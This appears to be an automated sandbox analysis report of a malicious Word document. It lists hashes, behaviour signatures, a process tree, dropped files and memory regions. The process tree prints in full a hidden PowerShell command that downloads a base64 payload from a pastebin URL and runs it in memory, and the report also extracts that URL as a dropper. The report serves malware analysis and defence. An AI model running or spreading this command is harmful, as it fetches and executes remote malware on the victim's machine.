Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240704-en locale:en-us os:windows7-x64 system
  • submitted
    24-07-2024 17:18

General

  • Target

    5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077.doc

  • Size

    781KB

  • MD5

    0949319f174a220b4e719715d9d5b20e

  • SHA1

    cdebf579f8f30226872d0b5bbeaeaa81877fe9c8

  • SHA256

    5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077

  • SHA512

    9e5f5362ea147aa19ae6ebe74cbf037b2a295343f01cab5b1a44a076954abf3773d77e3fae26e0ebf488b1fde579e2178a75183b6a74a5acb669b4ed503d9632

  • SSDEEP

    6144:rcnOY442OGwG1e3MenWfLds5Gn/RQQDPzuUC3uJXfr2opd91pV0mccMRdWIb8haR:rvCG1PenjQzi5Wyk/yJY0F

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/pw1Ht9hR

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5fe9554ff8c4a81a2a99ff2a12a6393c0cc1e89e6291751db310913431785077.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:332
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2128
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/pw1Ht9hR'))).EntryPoint.Invoke($null,$null)
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1976

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\53B49E3D.emf

      Filesize

      47KB

      MD5

      f8c7ec6da57ae75490132ff35cef2247

      SHA1

      962da8dd8ec8d636ebfeb3beecc296fa0b0e64f8

      SHA256

      849fdaaab3c0ca296b2c06a1d7b2f0779a594a0b796023810eda1d7606af31cb

      SHA512

      e44be74690c981f54b78765716abfb51e2f5108d034623bea9f5213dccd1b1342b9547370a09b7bf5a4f0c70c9d81c6d61d77e5fff6fe096e9313ba8b5a5d094

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      2f0f834345048da28b27f2fa6da7069c

      SHA1

      5c07a13a2ae65bed0ed1e9b9f22f413f00db18ed

      SHA256

      ee75dbaa8d608a14727b0d5015bbcfd03d2a61f92288ace767f54c582609df90

      SHA512

      7addddb2e71d5d98dd8fa17acc9dff260e22f2451e455a5a6c0fa286ea6f1780a52b199db4e890c70225c25b108a22b0bdd249a3c9a5fa1c8ccf9dcd6efd7fd8

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryFR040c.lex

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • memory/332-43-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-6-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-5-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-4-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-42-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/332-0-0x000000002F921000-0x000000002F922000-memory.dmp

      Filesize

      4KB

    • memory/332-2-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/332-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/332-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/332-69-0x0000000000640000-0x0000000000740000-memory.dmp

      Filesize

      1024KB

    • memory/332-68-0x00000000715FD000-0x0000000071608000-memory.dmp

      Filesize

      44KB

    • memory/1976-10-0x00000000054A0000-0x00000000054FB000-memory.dmp

      Filesize

      364KB